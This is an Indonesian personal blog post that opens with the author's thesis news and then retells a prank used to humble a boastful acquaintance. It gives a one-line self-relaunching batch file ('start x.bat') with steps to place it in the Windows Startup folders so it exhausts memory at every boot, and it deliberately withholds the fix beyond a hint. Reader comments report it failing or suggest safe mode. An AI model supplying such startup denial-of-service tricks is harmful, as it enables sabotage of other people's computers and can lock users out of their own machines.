-->

K.E ^_~ Yang lagi galau ini penawarnya link

Menumbangkan Kesombongan dengan 10 huruf

Wuuuaaahhhh.....dengan penantian yang cukup melelahkan dan perjuangan panjang...akhirnya selesai juga skripsiku...dan artinya selesai sudah petualanganku dikampus tercinta...
makasih buat do'anya iyaaa...sekarang saya memulai hari baru, cahaya baru, dengan status baru dan baju baru huakakakaka..(emangnye lebaran pake baju baru segala).

sebelum dan sesudahnya bagi bro bro yang setia mengunjungi klikedukasi, saya minta maaf, cz selama bulan april n mungkin bulan Mei tdak bisa full online dan produktivitas serta kreativitasku di jagat maya agak berkurang,,,,maklum bro saya dalam masa peralihan dari kampus pulang kekampung..he he he...
kebetulan sekarang lagi sibuk bantu2 ngolah data ...soryy ya bro...
tapi tenang ajah..saya tetap memantau n kl da unek2 ato pesan kesan (he he kayak perpisahan ajah) silahkan email ke np6103@yahoo.co.id ...insya Alloh tiap 3 hari sekali saya cek...

bay de wey, eni wey, dan banyak wey-wey yang lain, kemaren2 waktu saya jalan2 n cuci mata saya ketemu sama mas 4li3n (eh ktm sitenya mas 4li3n mksdnyah) lupa tanggal dan jam berapa
yang jelas ada sesuatu yang bikin saya tertarik. Ceritanya mas 4L13N kenalan sama Kawan temennya dia...selidik punya selidik kenalan barunya ini agak sombong, dia ngaku2 pernah ngeHack inilah itulah....singkat cerita mas 4L13N menjajal kesombongan kawan temennya itu,,,dan ternyata sesumbar itu bisa di tumbangkan hanya dengan SEPULUH huruf yang hanya di tulis dengan notepad. mau tau skriptnya???

sebelumnya saya minta maaf buat mas 4L13N, sebab saya publikasikan cerita dia tanpa seijinnya, dimaafkan yah mas...

SKRIPTNYA______________________________
buka notepad, tulis sepuluh huruf seperti di bawah...

start x.bat

Simpan dengan nama x.bat, kemudian copy kedalam folder startup yang berada pada direktory C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Copykan juga file
x.bat pada directory C:\Documents and Settings\"Nama Users" misalkan dikomputer saya C:\Documents and Settings\Nope'X

Penjelasannya sangat sederhana,,,,folder startup adalah folder pertama kali yang dipanggil oleh System Operasi ketika pertama kali windows berjalan...anda sudah bisa menebak bukan??? jika fle x.bat tersebut dipanggil maka secara otomatis file tersebut memanggil dirinya sendiri, secara berulang-ulang...begitu seterusnya sampe batas maksimal memori yang dimiliki komputer yang menjalankan x.bat itu..

Dahsyat bukan????
saya tidak menyarankan anda untuk mencoba2 pada komputer orang lain, silahkan anda coba pada komputer anda sendiri, dan saya juga tidak bertanggungjawab jika ada kerusakan yang diakibatkan karena ulah anda....

sengaja tidak saya sertakan cara menanganinya...karena saya menganggap ini sangat sederhana, so silahkan anda cari sendiri solusinya, berani berbuat harus berani bertanggung jawab otreee...

sebagai bocoran penawar, silahkan anda cari tempat dimana hanya program asli windows yang dapat berjalan, kl anda bisa mengakses itu, berarti kunci penawar sudah ada ditangan..
selamat mencoba ya..

thnk's to 4L13N






comment 2 komentar

  1. Gw coba ...
    tapi ga pengaruh sama sekali
    gw coba nya begini

    1. gw buka notepad
    2. tulis start x bat
    3. file name nya gw tulis start x.bat
    4. save as C:\Documents and Settings\All Users\StartMenu\Programs\Startup
    5. trus gw copas lgi di C:\Documents and Settings\rio (nama komp gw)

    tapi ga ada pengaruh apa2....

    BalasHapus
  2. Masuk safe mode aj
    hihihi :udud

    BalasHapus

Catatan:
Seluruh komentar yang masuk akan dimoderasi terlebih dahulu. Komentar yang berbau spam, kasar, menghina, seluruhnya yang bersifat menghancurkan bukan membangun tidak akan ditampilkan. Silahkan bertanya dan memberi pendapat dengan sopan dan sesuai aturan.

Anda diperbolehkan mempublikasikan ulang artikel ini, dengan syarat:
1. Mintalah izin dengan cara berkomentar di bawah artikel ini
2. Wajib menyertakan link ke artikel ini dan menyertakan nama penulis

 
© Klikedukasi 2008 - 2013 | Design by Panembahan Satyapradana | 170p3x